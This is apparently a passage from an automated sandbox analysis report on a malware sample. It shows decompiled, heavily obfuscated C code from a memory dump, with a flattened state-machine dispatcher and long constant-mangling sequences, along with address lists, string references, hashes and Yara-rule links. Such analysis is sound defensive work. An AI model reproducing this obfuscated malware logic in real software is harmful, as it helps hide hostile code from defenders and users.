									__eflags = _t402 - 0x20;
									if(_t402 != 0x20) {
										 *_t425 = _t402;
										_t425 =  &(_t425[0]);
										__eflags = _t425;
										continue;
									}
									break;
								}
								_t394 = 0;
								__eflags = 0;
								 *_t425 = 0;
							}
							_t371 =  &(_t371[1]);
							__eflags =  *_t371 - _t388;
						}
						_t426 = 0x45aba69;
						continue;
					} else {
						if(_t426 == 0x1ee2ebf) {
							_push(_v1624);
							_push(_t433);
							_push(_t394);
							_push(_t388);
							_push(_v1596);
							_push(_v1616);
							_push(_v1612);
							E1000D1FD(0, 0, __eflags);
							_t388 = 1;
							__eflags = 1;
						} else {
							if(_t426 == 0x45aba69) {
								_push(_v1592);
								_push(_v1672);
								_push(_v1656);
								_t375 = E1000DB91(_v1584,  &_v1560, E1000416C(_v1648, 0x10001844), _v1640, _v1580); // executed
								_t394 = _v1632;
								asm("sbb edi, edi");
								_t426 = ( ~_t375 & 0x038fbe3e) + 0x44ba35c;
								E1000B952(_t394, _t374, _v1572, _v1700);
								_t434 =  &(_t434[8]);
								goto L20;
							} else {
								if(_t426 == 0x7db619a) {
									_push(_t394);
									E1000441F(_v1636, _v1664, _v1660, _v1712,  &_v520, _t394, _v1696);
									E1001E780(_v1588, __eflags, _v1680,  &_v1040);
									_push(_v1704);
									_push(_v1688);
									_push(_v1652);
									E100049CE( &_v520,  &_v1040, E1000416C(_v1620, 0x10001934), _v1628, _v1644, _v1620, _v1600, _v1720);
									_t394 = _v1708;
									E1000B952(_t394, _t381, _v1716, _v1576);
									_t434 =  &(_t434[0x15]);
									_t426 = 0x1ee2ebf;
									continue;
								} else {
									if(_t426 != 0xdf6a94c) {
										L20:
										__eflags = _t426 - 0x44ba35c;
										if(__eflags != 0) {
											continue;
										} else {
										}
									} else {
										_t433 = E10006064();
										_t426 = 0x180b4a5;
										continue;
									}
								}
							}
						}
					}
					return _t388;
				}
				_t394 = _v1676;
				E1001A5E3(_t394,  &_v1560, _v1684, _v1604, 0x208, _v1692);
				_t434 =  &(_t434[4]);
				_t426 = 0xdf6a94c;
				goto L20;
			}

0x1001cfaa
0x1001cfb0
0x1001cfbe
0x1001cfc0
0x1001cfc7
0x1001cfcf
0x1001cfd7
0x1001cfdf
0x1001cfe7
0x1001cfef
0x1001cff7
0x1001cfff
0x1001d004
0x1001d00c
0x1001d014
0x1001d019
0x1001d021
0x1001d026
0x1001d02e
0x1001d040
0x1001d047
0x1001d04c
0x1001d057
0x1001d063
0x1001d068
0x1001d06e
0x1001d073
0x1001d07b
0x1001d083
0x1001d095
0x1001d09a
0x1001d0a3
0x1001d0ae
0x1001d0bb
0x1001d0bc
0x1001d0c0
0x1001d0c8
0x1001d0d0
0x1001d0de
0x1001d0e7
0x1001d0eb
0x1001d0f3
0x1001d0fb
0x1001d103
0x1001d10b
0x1001d113
0x1001d120
0x1001d124
0x1001d129
0x1001d131
0x1001d13c
0x1001d147
0x1001d152
0x1001d15d
0x1001d168
0x1001d173
0x1001d17b
0x1001d183
0x1001d18b
0x1001d195
0x1001d1ab
0x1001d1b4
0x1001d1bf
0x1001d1c7
0x1001d1cc
0x1001d1d4
0x1001d1dc
0x1001d1e7
0x1001d1f2
0x1001d1fd
0x1001d205
0x1001d212
0x1001d215
0x1001d219
0x1001d221
0x1001d229
0x1001d231
0x1001d239
0x1001d241
0x1001d249
0x1001d251
0x1001d25e
0x1001d262
0x1001d26a
0x1001d272
0x1001d277
0x1001d27f
0x1001d287
0x1001d28f
0x1001d297
0x1001d29f
0x1001d2a9
0x1001d2ad
0x1001d2b5
0x1001d2c0
0x1001d2cb
0x1001d2d6
0x1001d2de
0x1001d2e6
0x1001d2eb
0x1001d2f0
0x1001d2f8
0x1001d300
0x1001d308
0x1001d30d
0x1001d315
0x1001d325
0x1001d329
0x1001d32e
0x1001d336
0x1001d342
0x1001d347
0x1001d34d
0x1001d355
0x1001d35a
0x1001d362
0x1001d36f
0x1001d370
0x1001d37a
0x1001d37e
0x1001d383
0x1001d38b
0x1001d393
0x1001d398
0x1001d3a0
0x1001d3a8
0x1001d3b0
0x1001d3b8
0x1001d3c0
0x1001d3c8
0x1001d3d3
0x1001d3db
0x1001d3e6
0x1001d3ee
0x1001d3f6
0x1001d3fe
0x1001d406
0x1001d40e
0x1001d41b
0x1001d41f
0x1001d427
0x1001d42c
0x1001d434
0x1001d43c
0x1001d449
0x1001d452
0x1001d456
0x1001d45e
0x1001d469
0x1001d474
0x1001d47f
0x1001d487
0x1001d48f
0x1001d497
0x1001d49b
0x1001d4a3
0x1001d4ab
0x1001d4b3
0x1001d4bb
0x1001d4c6
0x1001d4d1
0x1001d4dc
0x1001d4e4
0x1001d4ec
0x1001d4f4
0x1001d4fc
0x1001d50e
0x1001d678
0x1001d67a
0x1001d67e
0x1001d680
0x1001d684
0x1001d686
0x1001d69b
0x1001d69b
0x1001d69e
0x1001d6a1
0x1001d6a4
0x00000000
0x00000000
0x1001d68f
0x1001d693
0x1001d695
0x1001d698
0x1001d698
0x00000000
0x1001d698
0x00000000
0x1001d693
0x1001d6a6
0x1001d6a6
0x1001d6a8
0x1001d6a8
0x1001d6ab
0x1001d6ae
0x1001d6ae
0x1001d6b3
0x00000000
0x1001d514
0x1001d51a
0x1001d6f7
0x1001d6fd
0x1001d6fe
0x1001d6ff
0x1001d700
0x1001d709
0x1001d710
0x1001d717
0x1001d721
0x1001d721
0x1001d520
0x1001d526
0x1001d60a
0x1001d616
0x1001d61a
0x1001d643
0x1001d657
0x1001d660
0x1001d668
0x1001d66e
0x1001d673
0x00000000
0x1001d52c
0x1001d532
0x1001d559
0x1001d57a
0x1001d592
0x1001d597
0x1001d5a0
0x1001d5a4
0x1001d5e2
0x1001d5f4
0x1001d5f8
0x1001d5fd
0x1001d600
0x00000000
0x1001d534
0x1001d53a
0x1001d6e9
0x1001d6e9
0x1001d6ef
0x00000000
0x00000000
0x1001d6f5
0x1001d540
0x1001d550
0x1001d552
0x00000000
0x1001d552
0x1001d53a
0x1001d532
0x1001d526
0x1001d51a
0x1001d72e
0x1001d72e
0x1001d6d8
0x1001d6dc
0x1001d6e1
0x1001d6e4
0x00000000

Strings

W, xrefs: 1001D231
$BA, xrefs: 1001D474
Ow, xrefs: 1001D35A
., xrefs: 1001CFD7
w, xrefs: 1001D362
;{, xrefs: 1001D026
S36, xrefs: 1001D229
,40, xrefs: 1001D10B

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID:
String ID: $BA$,40$Ow$S36$w$.$;{$W
API String ID: 0-3466671131
Opcode ID: 0347ad26f4eb0c09b13d545e2f3566983a71a2e396c186336176d32258c830fa
Instruction ID: 72a01448cf7e60c9c46a097a0cfb735a91b9c03a18710f6c84ba4bd034ef51e7
Opcode Fuzzy Hash: 0347ad26f4eb0c09b13d545e2f3566983a71a2e396c186336176d32258c830fa
Instruction Fuzzy Hash: 730210715083819FD7A8DF25C48AA4BBBE2FBC4358F108A1DF5D986260D7B09989CF47

Uniqueness

Uniqueness Score: -1.00%

Function 1000DB91, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 41
stringCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E1000DB91(void* __ecx, WCHAR* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				void* _t28;
				int _t35;
				void* _t39;
				WCHAR* _t40;

				_push(_a12);
				_t40 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E100167B8(_t28);
				_v20 = _v20 & 0x00000000;
				_v24 = 0xde285;
				_v16 = 0x6c7dfd;
				_v16 = _v16 + 0x24c5;
				_v16 = _v16 ^ 0x006d386a;
				_v8 = 0xad6802;
				_v8 = _v8 >> 7;
				_push(0xbcc93abd);
				_t39 = 0x3d;
				_v8 = _v8 * 0x22;
				_v8 = _v8 ^ 0x0020f962;
				_v12 = 0xd69526;
				_v12 = _v12 ^ 0x5b05b32e;
				_v12 = _v12 ^ 0x5bd8531b;
				E1001F90C(0x94848034, _t39);
				_t35 = lstrcmpiW(_t40, _a4); // executed
				return _t35;
			}

0x1000db98
0x1000db9b
0x1000db9d
0x1000dba0
0x1000dba3
0x1000dba5
0x1000dbaa
0x1000dbb1
0x1000dbbd
0x1000dbc4
0x1000dbcb
0x1000dbd2
0x1000dbd9
0x1000dbe1
0x1000dbe8
0x1000dbe9
0x1000dbec
0x1000dbf3
0x1000dbfa
0x1000dc01
0x1000dc11
0x1000dc1d
0x1000dc23

APIs

lstrcmpiW.KERNELBASE(?,5BD8531B), ref: 1000DC1D

Strings

j8m, xrefs: 1000DBCB

Memory Dump Source

Source File: 00000000.00000002.360520521.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Similarity

API ID: lstrcmpi
String ID: j8m
API String ID: 1586166983-2661103354
Opcode ID: bb13d5ff7afcf16fdaca98bcbd3383cb356e445dea633a1fe613d0ff9892b8bd
Instruction ID: 1cd6c228a480c967147338adbc3ad72f762a02fa0213596a0ae62be83f667a01
Opcode Fuzzy Hash: bb13d5ff7afcf16fdaca98bcbd3383cb356e445dea633a1fe613d0ff9892b8bd
Instruction Fuzzy Hash: BB0157B5C0120CFBCB05DFA4D9069EEBFB8EF04354F208089E8146A251D3B19B549F90

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 10017FFB, Relevance: 34.9, Strings: 27, Instructions: 1152
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E10017FFB() {
				signed int _v12;
				signed int _v20;
				signed int _v36;
				char _v72;
				signed int _v76;
				signed int _v80;
				intOrPtr _v84;
				signed int _v88;
				char _v92;
				char _v100;
				signed int _v124;
				char _v140;
				void* _v152;
				intOrPtr _v156;
				char _v164;
				char _v172;
				char _v176;
				char _v180;
				char _v184;
				char _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				unsigned int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				unsigned int _v388;
				signed int _v392;
				signed int _v396;
				unsigned int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				unsigned int _v420;
				signed int _v424;
				signed int _v428;
				unsigned int _v432;
				signed int _v436;
				signed int _v440;
				signed int _v444;
				signed int _v448;
				signed int _v452;
				signed int _v456;
				signed int _v460;
				signed int _v464;
				signed int _v468;
				signed int _v472;
				signed int _v476;
				signed int _v480;
				signed int _v484;
				signed int _v488;
				signed int _v492;
				signed int _v496;
				signed int _v500;
				signed int _v504;
				signed int _v508;
				signed int _v512;
				signed int _v516;
				signed int _v520;
				unsigned int _v524;
				unsigned int _v528;
				signed int _v532;
				signed int _v536;
				unsigned int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				unsigned int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _t1214;
				signed int _t1215;
				signed int _t1245;
				signed int _t1261;
				signed int _t1289;
				signed int _t1290;
				signed int _t1292;
				signed int _t1293;
				signed int _t1294;
				signed int _t1295;
				signed int _t1296;
				signed int _t1297;
				signed int _t1298;
				signed int _t1299;
				signed int _t1300;
				signed int _t1301;
				signed int _t1302;
				signed int _t1303;
				signed int _t1304;
				signed int _t1305;
				signed int _t1306;
				signed int _t1307;
				signed int _t1308;
				signed int _t1309;
				signed int _t1310;
				signed int _t1311;
				signed int _t1312;
				signed int _t1313;
				signed int _t1314;
				signed int _t1315;
				signed int _t1316;
				signed int _t1422;
				signed int _t1423;
				signed int _t1424;
				signed int _t1427;
				signed int _t1437;
				signed int _t1455;
				void* _t1457;
				void* _t1459;
				void* _t1460;
				void* _t1461;

				_t1457 = (_t1455 & 0xfffffff8) - 0x290;
				_v156 = 0x7ab4cd;
				asm("stosd");
				_t1427 = 0x42d7764;
				_t1292 = 0x31;
				asm("stosd");
				asm("stosd");
				_v600 = 0x30764e;
				_v600 = _v600 << 0x10;
				_v600 = _v600 * 0x3c;
				_v600 = _v600 + 0xffff596c;
				_v600 = _v600 ^ 0xba47586e;
				_v364 = 0x7e6a34;
				_v364 = _v364 + 0xaceb;
				_v364 = _v364 << 3;
				_v364 = _v364 ^ 0x03f8b8f8;
				_v640 = 0x9b3f0e;
				_v640 = _v640 | 0xe7214e13;
				_v640 = _v640 << 0xf;
				_v640 = _v640 * 0x25;
				_v640 = _v640 ^ 0xafbd8000;
				_v568 = 0xd163d3;
				_v568 = _v568 ^ 0xcd38777a;
				_v568 = _v568 / _t1292;
				_v568 = _v568 + 0xc115;
				_v568 = _v568 ^ 0x04360138;
				_v576 = 0xedf3c7;
				_v576 = _v576 + 0xffffe886;
				_t1293 = 0x36;
				_v576 = _v576 * 0x57;
				_v576 = _v576 + 0x8838;
				_v576 = _v576 ^ 0x50d047c2;
				_v472 = 0x12adc0;
				_v472 = _v472 + 0xc44;
				_v472 = _v472 << 5;
				_v472 = _v472 ^ 0x025596ff;
				_v644 = 0xfe09e5;
				_v644 = _v644 | 0x6a62cc15;
				_v644 = _v644 >> 9;
				_v644 = _v644 + 0xffff3be3;
				_v644 = _v644 ^ 0x0038952a;
				_v564 = 0x444185;
				_v564 = _v564 + 0xfffffa79;
				_v564 = _v564 | 0x9e4615cf;
				_v564 = _v564 * 0x24;
				_v564 = _v564 ^ 0x41ed0c51;
				_v424 = 0x90edfc;
				_v424 = _v424 | 0x7832a1a9;
				_v424 = _v424 + 0xffffa648;
				_v424 = _v424 ^ 0x78b5efe4;
				_v288 = 0xf5b9e8;
				_v288 = _v288 + 0xfffff2b0;
				_v288 = _v288 ^ 0x00ff70f9;
				_v216 = 0x4f057f;
				_v216 = _v216 / _t1293;
				_v216 = _v216 ^ 0x000be1a9;
				_v584 = 0x63d31b;
				_v584 = _v584 << 0xf;
				_t1294 = 0x54;
				_v584 = _v584 / _t1294;
				_t1295 = 0x4d;
				_v584 = _v584 * 0x31;
				_v584 = _v584 ^ 0x88380537;
				_v400 = 0xdca9a;
				_v400 = _v400 << 2;
				_v400 = _v400 >> 8;
				_v400 = _v400 ^ 0x0004061a;
				_v196 = 0xb68370;
				_v196 = _v196 / _t1295;
				_v196 = _v196 ^ 0x000efa3b;
				_v420 = 0xcc41e8;
				_v420 = _v420 >> 1;
				_v420 = _v420 + 0xffff353f;
				_v420 = _v420 ^ 0x0062579c;
				_v412 = 0x74f7f1;
				_v412 = _v412 ^ 0xdccbb957;
				_v412 = _v412 << 3;
				_v412 = _v412 ^ 0xe5f3faab;
				_v404 = 0x13a6b8;
				_v404 = _v404 ^ 0x33710973;
				_v404 = _v404 << 4;
				_v404 = _v404 ^ 0x36246d3e;
				_v224 = 0xeba0d6;
				_t1296 = 0x14;
				_v224 = _v224 / _t1296;
				_v224 = _v224 ^ 0x000bf056;
				_v604 = 0x739d32;
				_v604 = _v604 >> 5;
				_t1297 = 0x73;
				_v604 = _v604 * 0x7b;
				_v604 = _v604 ^ 0x3e9faab8;
				_v604 = _v604 ^ 0x3f2463ff;
				_v312 = 0x72b5b;
				_v312 = _v312 ^ 0x447dc0b3;
				_v312 = _v312 ^ 0x44765a23;
				_v636 = 0xee7ccf;
				_v636 = _v636 + 0xfffff79b;
				_v636 = _v636 | 0xbaf3e6f7;
				_v636 = _v636 ^ 0xbaf2537c;
				_v392 = 0x538904;
				_v392 = _v392 << 6;
				_v392 = _v392 + 0xffffa3a9;
				_v392 = _v392 ^ 0x14e01d2e;
				_v336 = 0x78124a;
				_v336 = _v336 + 0x4d47;
				_v336 = _v336 << 0x10;
				_v336 = _v336 ^ 0x5f9651b4;
				_v428 = 0x490fe;
				_v428 = _v428 + 0xffff2f08;
				_v428 = _v428 * 0x1f;
				_v428 = _v428 ^ 0x0071d99d;
				_v436 = 0x43373f;
				_v436 = _v436 >> 4;
				_v436 = _v436 ^ 0x953d0a4b;
				_v436 = _v436 ^ 0x95358989;
				_v536 = 0xc77d2c;
				_v536 = _v536 / _t1297;
				_v536 = _v536 >> 2;
				_v536 = _v536 << 0x10;
				_v536 = _v536 ^ 0x6f0057cb;
				_v396 = 0x551d73;
				_t1298 = 0x68;
				_v396 = _v396 / _t1298;
				_v396 = _v396 + 0xffff9c22;
				_v396 = _v396 ^ 0x0008cf20;
				_v388 = 0x5867e5;
				_v388 = _v388 >> 0xa;
				_v388 = _v388 >> 0xc;
				_v388 = _v388 ^ 0x0007d563;
				_v460 = 0xf18a29;
				_v460 = _v460 + 0xffffc1fa;
				_v460 = _v460 ^ 0x85faded9;
				_v460 = _v460 ^ 0x850584e8;
				_v544 = 0x725641;
				_v544 = _v544 + 0x28f1;
				_v544 = _v544 >> 0xc;
				_t1299 = 0x7c;
				_v544 = _v544 / _t1299;
				_v544 = _v544 ^ 0x000557ed;
				_v256 = 0x2be065;
				_t256 =  &_v256; // 0x2be065
				_t1300 = 3;
				_v256 =  *_t256 / _t1300;
				_v256 = _v256 ^ 0x000af20b;
				_v228 = 0xc49853;
				_v228 = _v228 | 0x95a3c456;
				_v228 = _v228 ^ 0x95e70d39;
				_v236 = 0xee5011;
				_t1301 = 0x1a;
				_v236 = _v236 * 0x18;
				_v236 = _v236 ^ 0x1653d68c;
				_v488 = 0x5aa41f;
				_v488 = _v488 + 0xffff7384;
				_v488 = _v488 | 0xa83ed757;
				_v488 = _v488 + 0xac09;
				_v488 = _v488 ^ 0xa87ab094;
				_v264 = 0x8fd410;
				_v264 = _v264 >> 0xe;
				_v264 = _v264 ^ 0x00085e3c;
				_v280 = 0x95419e;
				_v280 = _v280 + 0xffffde54;
				_v280 = _v280 ^ 0x009a269a;
				_v628 = 0xb4831e;
				_t1302 = 0x43;
				_v628 = _v628 / _t1301;
				_v628 = _v628 | 0x5d574909;
				_v628 = _v628 / _t1302;
				_v628 = _v628 ^ 0x016164b3;
				_v220 = 0xbfd7ea;
				_v220 = _v220 >> 5;
				_v220 = _v220 ^ 0x000aab8c;
				_v556 = 0xe544f4;
				_v556 = _v556 >> 5;
				_v556 = _v556 << 7;
				_t1422 = 0x62;
				_v556 = _v556 * 0xc;
				_v556 = _v556 ^ 0x2af6cadc;
				_v316 = 0x27b568;
				_v316 = _v316 >> 2;
				_v316 = _v316 << 2;
				_v316 = _v316 ^ 0x0021036e;
				_v516 = 0xd6aa15;
				_v516 = _v516 + 0xffff35b5;
				_v516 = _v516 / _t1422;
				_v516 = _v516 ^ 0x91396df3;
				_v516 = _v516 ^ 0x91366bca;
				_v384 = 0x64e347;
				_t345 =  &_v384; // 0x64e347
				_t1303 = 0x55;
				_t1289 = 0x1d;
				_v384 =  *_t345 * 0x50;
				_v384 = _v384 << 9;
				_v384 = _v384 ^ 0x0e0f99a0;
				_v456 = 0x8f042d;
				_v456 = _v456 + 0x832e;
				_v456 = _v456 + 0x3fac;
				_v456 = _v456 ^ 0x00887584;
				_v352 = 0xc465f2;
				_v352 = _v352 | 0xf50d3e48;
				_v352 = _v352 * 0x44;
				_v352 = _v352 ^ 0x4a9ffa71;
				_v548 = 0xded809;
				_v548 = _v548 * 0x4e;
				_v548 = _v548 ^ 0x53c7743a;
				_v548 = _v548 + 0xffff056e;
				_v548 = _v548 ^ 0x1024cdcd;
				_v620 = 0xadd5dd;
				_v620 = _v620 + 0xfffff447;
				_v620 = _v620 | 0xe25b8374;
				_v620 = _v620 + 0x4156;
				_v620 = _v620 ^ 0xe301e7b9;
				_v320 = 0x1a710f;
				_v320 = _v320 * 0x79;
				_v320 = _v320 | 0x9c2a40d7;
				_v320 = _v320 ^ 0x9c765af9;
				_v448 = 0x7ccc58;
				_v448 = _v448 << 7;
				_v448 = _v448 + 0x7e5a;
				_v448 = _v448 ^ 0x3e619d44;
				_v484 = 0x7161eb;
				_v484 = _v484 + 0xffff2163;
				_v484 = _v484 / _t1303;
				_v484 = _v484 / _t1289;
				_v484 = _v484 ^ 0x000d7f7d;
				_v612 = 0x6582dc;
				_v612 = _v612 ^ 0x26782382;
				_v612 = _v612 + 0xffff54be;
				_v612 = _v612 + 0xf4cf;
				_v612 = _v612 ^ 0x2614835e;
				_v440 = 0x8ae5bb;
				_v440 = _v440 ^ 0x73488074;
				_v440 = _v440 << 8;
				_v440 = _v440 ^ 0xc26a8310;
				_v232 = 0x1a1065;
				_v232 = _v232 + 0xffff0374;
				_v232 = _v232 ^ 0x001e4fd1;
				_v304 = 0xa930ee;
				_v304 = _v304 * 0x4e;
				_v304 = _v304 ^ 0x338ec41c;
				_v376 = 0xded04f;
				_v376 = _v376 >> 9;
				_v376 = _v376 | 0xaf09e436;
				_v376 = _v376 ^ 0xaf0f0132;
				_v208 = 0x61e51c;
				_v208 = _v208 * 0x58;
				_v208 = _v208 ^ 0x21abb6ab;
				_v540 = 0xec112c;
				_v540 = _v540 + 0xffffd9d8;
				_v540 = _v540 + 0xfffffdc9;
				_v540 = _v540 >> 1;
				_v540 = _v540 ^ 0x007a7201;
				_v432 = 0x18e74b;
				_t1304 = 0xa;
				_v432 = _v432 / _t1304;
				_v432 = _v432 >> 2;
				_v432 = _v432 ^ 0x000ca85f;
				_v596 = 0x1741f4;
				_t1305 = 0x2a;
				_v596 = _v596 * 0x26;
				_v596 = _v596 >> 0xd;
				_v596 = _v596 ^ 0x7c80afd6;
				_v596 = _v596 ^ 0x7c8d12bb;
				_v360 = 0xe62e78;
				_t482 =  &_v360; // 0xe62e78
				_v360 =  *_t482 / _t1422;
				_v360 = _v360 + 0xffff66e4;
				_v360 = _v360 ^ 0x000c777e;
				_v552 = 0x8e7147;
				_v552 = _v552 + 0x1769;
				_v552 = _v552 * 0x61;
				_v552 = _v552 + 0xb0f;
				_v552 = _v552 ^ 0x360881a1;
				_v560 = 0xbc4c47;
				_v560 = _v560 / _t1305;
				_v560 = _v560 >> 0xd;
				_v560 = _v560 + 0xde3d;
				_v560 = _v560 ^ 0x00058b70;
				_v192 = 0xc05679;
				_t1306 = 0x18;
				_v192 = _v192 / _t1306;
				_v192 = _v192 ^ 0x00040ffb;
				_v296 = 0x6a649;
				_v296 = _v296 + 0x5cd4;
				_v296 = _v296 ^ 0x0003a11f;
				_v500 = 0xb5bb69;
				_v500 = _v500 ^ 0x292b67ad;
				_v500 = _v500 + 0xc8e4;
				_v500 = _v500 | 0x141ab4bb;
				_v500 = _v500 ^ 0x3d9df8ab;
				_v652 = 0x19db21;
				_v652 = _v652 >> 0xd;
				_v652 = _v652 << 4;
				_v652 = _v652 ^ 0x673bd45e;
				_v652 = _v652 ^ 0x673f57b9;
				_v444 = 0x5dd547;
				_v444 = _v444 + 0x736a;
				_v444 = _v444 >> 0xc;
				_v444 = _v444 ^ 0x000c86eb;
				_v452 = 0x49c441;
				_v452 = _v452 >> 0xb;
				_v452 = _v452 + 0x2574;
				_v452 = _v452 ^ 0x00071663;
				_v324 = 0x4b21a5;
				_v324 = _v324 + 0x8264;
				_v324 = _v324 | 0xb4417091;
				_v324 = _v324 ^ 0xb44585af;
				_v408 = 0x445c00;
				_v408 = _v408 ^ 0x0cb61eeb;
				_v408 = _v408 * 0x6a;
				_v408 = _v408 ^ 0x5c432c13;
				_v200 = 0x607a60;
				_t575 =  &_v200; // 0x607a60
				_v200 =  *_t575 * 0x51;
				_v200 = _v200 ^ 0x1e8f0d9f;
				_v416 = 0x7162cd;
				_t1307 = 0x3d;
				_v416 = _v416 * 0x50;
				_v416 = _v416 ^ 0x5fc1ed4a;
				_v416 = _v416 ^ 0x7ca1a4ba;
				_v648 = 0xc612f0;
				_v648 = _v648 / _t1307;
				_v648 = _v648 << 5;
				_v648 = _v648 | 0xbda83c29;
				_v648 = _v648 ^ 0xbdef10cb;
				_v656 = 0x14ecdd;
				_v656 = _v656 | 0x23bf9cc1;
				_v656 = _v656 + 0xb80f;
				_t1308 = 0x49;
				_v656 = _v656 * 0x6d;
				_v656 = _v656 ^ 0x39044513;
				_v520 = 0x77a2bb;
				_v520 = _v520 * 0x18;
				_v520 = _v520 ^ 0x02290108;
				_v520 = _v520 ^ 0xbf37f5ef;
				_v520 = _v520 ^ 0xb62106f2;
				_v300 = 0xb8d075;
				_v300 = _v300 * 0x43;
				_v300 = _v300 ^ 0x30508e5a;
				_v292 = 0x484c33;
				_v292 = _v292 + 0x9a66;
				_v292 = _v292 ^ 0x004f5006;
				_v512 = 0x73d2cc;
				_v512 = _v512 + 0xffff7cd0;
				_v512 = _v512 + 0xffff36f2;
				_v512 = _v512 ^ 0xc2d4edac;
				_v512 = _v512 ^ 0xc2a16053;
				_v204 = 0x11b099;
				_v204 = _v204 ^ 0x5f513605;
				_v204 = _v204 ^ 0x5f4c64c8;
				_v248 = 0xa5071d;
				_v248 = _v248 / _t1308;
				_v248 = _v248 ^ 0x0001ef5d;
				_v372 = 0x378ab;
				_v372 = _v372 ^ 0x2fb822a0;
				_v372 = _v372 >> 5;
				_v372 = _v372 ^ 0x01706552;
				_v380 = 0x6980bf;
				_v380 = _v380 * 0x47;
				_v380 = _v380 * 0x3e;
				_v380 = _v380 ^ 0x16203149;
				_v348 = 0x248d94;
				_v348 = _v348 + 0xffffad45;
				_v348 = _v348 + 0xfc85;
				_v348 = _v348 ^ 0x0022c172;
				_v356 = 0xc16add;
				_v356 = _v356 << 1;
				_v356 = _v356 + 0xa6ec;
				_v356 = _v356 ^ 0x018c04a4;
				_v528 = 0xfe7819;
				_v528 = _v528 + 0xffff74f0;
				_v528 = _v528 ^ 0xfef72eb1;
				_v528 = _v528 >> 9;
				_v528 = _v528 ^ 0x007ffe54;
				_v332 = 0xb4009e;
				_v332 = _v332 * 0x57;
				_v332 = _v332 + 0x3f1d;
				_v332 = _v332 ^ 0x3d2b723c;
				_v572 = 0x210bd2;
				_v572 = _v572 ^ 0x76258994;
				_v572 = _v572 | 0x08c49b61;
				_t1309 = 0x28;
				_v572 = _v572 / _t1309;
				_v572 = _v572 ^ 0x032a2496;
				_v524 = 0xe55dc6;
				_t1310 = 0x5d;
				_v524 = _v524 / _t1310;
				_t1423 = 0x3a;
				_t1311 = 0x13;
				_v524 = _v524 * 0x35;
				_v524 = _v524 >> 8;
				_v524 = _v524 ^ 0x0005c6f3;
				_v260 = 0xd1e162;
				_v260 = _v260 + 0xd6ae;
				_v260 = _v260 ^ 0x00d72eca;
				_v268 = 0xc37de2;
				_v268 = _v268 << 3;
				_v268 = _v268 ^ 0x061e1318;
				_v496 = 0x73eec3;
				_v496 = _v496 >> 0xb;
				_v496 = _v496 + 0x62f8;
				_v496 = _v496 / _t1423;
				_v496 = _v496 ^ 0x0008c89a;
				_v504 = 0xde3af4;
				_v504 = _v504 | 0xe17fefb9;
				_v504 = _v504 + 0xa82e;
				_v504 = _v504 ^ 0xe209a937;
				_v492 = 0x52f1b1;
				_v492 = _v492 | 0x2f832f2b;
				_v492 = _v492 ^ 0xce8cdf52;
				_v492 = _v492 + 0xffff986f;
				_v492 = _v492 ^ 0xe1595403;
				_v580 = 0x7e304;
				_v580 = _v580 + 0x6365;
				_v580 = _v580 >> 0xb;
				_v580 = _v580 / _t1311;
				_v580 = _v580 ^ 0x000a1821;
				_v532 = 0xa7f5f8;
				_v532 = _v532 * 0x1a;
				_v532 = _v532 * 0x62;
				_v532 = _v532 + 0x597c;
				_v532 = _v532 ^ 0x87b7e4e6;
				_v588 = 0x984bdb;
				_v588 = _v588 >> 0x10;
				_v588 = _v588 << 0xb;
				_v588 = _v588 << 4;
				_v588 = _v588 ^ 0x004848cd;
				_v632 = 0xf0e8ad;
				_v632 = _v632 + 0xffff46d0;
				_v632 = _v632 >> 0xc;
				_v632 = _v632 * 0x3c;
				_v632 = _v632 ^ 0x0000e0b8;
				_v608 = 0x157d54;
				_v608 = _v608 << 0xc;
				_v608 = _v608 / _t1289;
				_v608 = _v608 * 0x41;
				_v608 = _v608 ^ 0xc4d57eeb;
				_v616 = 0x6cf744;
				_v616 = _v616 << 9;
				_t1312 = 0x5e;
				_v616 = _v616 * 0x4c;
				_v616 = _v616 ^ 0xecb4214d;
				_v616 = _v616 ^ 0x5e6538fa;
				_v272 = 0xb96fc7;
				_v272 = _v272 << 8;
				_v272 = _v272 ^ 0xb964a60d;
				_v624 = 0x9bcb54;
				_v624 = _v624 + 0xa0b8;
				_v624 = _v624 + 0xe728;
				_v624 = _v624 >> 6;
				_v624 = _v624 ^ 0x000d9552;
				_v476 = 0x320128;
				_v476 = _v476 ^ 0x6966cde1;
				_v476 = _v476 * 0x41;
				_v476 = _v476 ^ 0xbe8a8d15;
				_v592 = 0x20cea6;
				_v592 = _v592 >> 0x10;
				_v592 = _v592 / _t1312;
				_v592 = _v592 << 0xc;
				_v592 = _v592 ^ 0x00037223;
